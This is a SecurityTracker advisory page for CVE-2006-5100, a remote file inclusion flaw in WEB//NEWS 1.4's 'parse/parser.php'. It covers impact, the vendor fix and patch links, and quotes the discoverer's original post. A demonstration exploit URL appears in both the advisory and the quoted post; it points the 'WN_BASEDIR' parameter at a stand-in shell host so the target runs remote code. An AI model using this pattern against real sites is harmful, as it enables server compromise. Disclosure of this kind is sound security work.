WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code - SecurityTracker

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Category: Application (Forum/Board/Portal) > WEB//NEWS

Vendors: Stylemotion.de

WEB//NEWS Include File Flaw in 'parse/parser.php' Lets Remote Users Execute Arbitrary Code

SecurityTracker Alert ID: 1016938

SecurityTracker URL: http://securitytracker.com/id/1016938

CVE Reference: CVE-2006-5100 (Links to External Site)

Updated: Jun 3 2008

Original Entry Date: Sep 27 2006

Impact: Execution of arbitrary code via network, User access via network

Fix Available: Yes Vendor Confirmed: Yes Exploit Included: Yes

Version(s): 1.4 prior to Build 26092006-01

Description: ThE-WoLf-KsA reported a vulnerability in WEB//NEWS. A remote user can execute arbitrary code on the target system.

The 'parse/parser.php' script does not properly validate user-supplied input in the 'WN_BASEDIR' parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

htpp://[target]/[scriptPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM

Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

Solution: The vendor has issued a fixed version (Version 1.4 Build 26092006-01).

Also, a patch (1.4 security patch 2) is available at:

http://www.stylemotion.de/downloads-id3-web-news-1-4-sicherheits-patch-2.html

The stylemotion.de advisory is available at:

http://www.stylemotion.de/forum/thread-1978-1-sicherheitspatch.html

Vendor URL: www.stylemotion.de/webnews.html (Links to External Site)

Cause: Input validation error, State error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History: None.

Source Message Contents

Subject: webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit

#==============================================================================================
#webnews <= v1.4 (WN_BASEDIR) Remote File Inclusion Exploit
#===============================================================================================
#
#Critical Level : Dangerous
#
#
#
#Version : v1.4
#
#================================================================================================
#Bug in : parse/parser.php
#
#Vlu Code :
#--------------------------------
#
#            require($WN_BASEDIR."/parse/parser.php");
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#htpp://sitename.com[scerpitPath]/parse/parser.php?WN_BASEDIR=http://SHELLURL.COM
#
#================================================================================================
#Discoverd By : ThE-WoLf-KsA
#
#Conatact : the-wolf-ksa[at]hotmail.com
#XP10_hackEr Team
#
#WWW.XP10.COM
==================================================================================================

vendor:
http://www.stylemotion.de/downloads-id1-web-news-1-4.html

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE! 
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
This web site uses cookies for web analytics. Learn More
Copyright 2020, SecurityGlobal.net LLC